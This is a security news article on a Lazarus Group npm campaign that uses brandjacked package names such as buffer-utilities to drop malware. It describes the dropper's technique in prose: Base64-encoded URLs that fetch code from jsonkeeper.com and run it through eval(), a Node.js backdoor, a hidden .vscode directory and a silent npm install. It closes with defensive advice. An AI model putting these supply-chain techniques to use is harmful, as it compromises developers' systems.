A recent npm campaign, attributed to North Korea’s Lazarus Group, has highlighted a new strategy in which attackers employ deceptive package names to infiltrate developers’ systems and software build environments. This tactic poses significant risks for organizations reliant on JavaScript tools, as many developers may unwittingly install these malicious packages.
According to Sonatype Security Research, dozens of malicious npm packages linked to this campaign have been identified, with some achieving as many as 500 downloads per week. These packages are crafted to mimic connections to trusted JavaScript projects, thereby increasing the likelihood that developers will inadvertently incorporate them into their workflows.
More Than Just npm Typosquatting
While traditional attacks often rely on typosquatting techniques, Sonatype’s findings reveal that this campaign employs more sophisticated methods known as brandjacking. These tactics include the use of modified suffixes, incorporation of well-known project names, and version imitation. Researchers have noted names designed to resemble popular libraries such as Buffer, Chai, React, Express, JWT, and Webpack.
This naming approach is particularly effective in the npm ecosystem, which is abundant with numerous small libraries and plugins. For instance, a package labeled buffer-utilities could easily be mistaken for a legitimate enhancement to the widely utilized buffer package, despite having no authentic affiliation with it.
Sonatype’s analysis of buffer-utilities revealed that it not only copied instructions from the genuine buffer library but also functioned as a malicious dropper. Upon installation, it executed Base64-encoded URLs to retrieve remote content from www.jsonkeeper.com and executed the fetched code using the eval() function.
This pattern was observed in other packages associated with the same Lazarus Group activities. Notably, the use of www.jsonkeeper.com has been documented in previous intercepts involving Lazarus, indicating a broader strategy to leverage this service for malicious payload hosting.
Following the initial phase of the malware, a Node.js backdoor can be deployed, gathering essential system information such as the hostname, username, operating system, home directory, and process arguments. This data is subsequently sent back to the attackers, allowing for further commands and actions to be executed remotely.
The malware can also generate a hidden .vscode directory within the user’s home folder, download additional components, and execute JavaScript controlled by the attacker as a background process. Sonatype has indicated that this package is capable of fetching an additional payload named f.js along with a package.json file, executing npm install --silent before running the payload as well.
These behaviors enable attackers to maintain access to compromised systems and to refresh malicious files over time. Sonatype has reported an update mechanism that allows the payload to reconnect with command and control servers, check for newer versions, and replace local files, thus extending the potential for long-term disruptions.
The implications of this campaign exhibit why npm remains an attractive target for advanced threat actors. Developers often select packages based on familiarity and convenience, making the ecosystems of JavaScript and npm particularly vulnerable to such deceptive tactics. The association with the Lazarus Group adds further significance, as this group, known for its involvement in financial heists and espionage, is now clearly focusing on gaining access to developer environments and enterprise infrastructure.
Protect Your Devices
Organizations that utilized version 1.0.0 of buffer-utilities, or any packages flagged with the Sonatype identifier sonatype-2026-003558, are strongly advised to remove them and conduct a thorough review of their systems for signs of compromise. Simply deleting the package may not suffice, particularly if subsequent malicious payloads have already been activated.
In addition, administrators should monitor for any network traffic linked to www.jsonkeeper.com, as well as any irregular command and control communications. It’s crucial to investigate unexpected .vscode directories, unusual Node.js processes, and any unauthorized credential access from development workstations or build systems to mitigate the risks posed by this ongoing threat.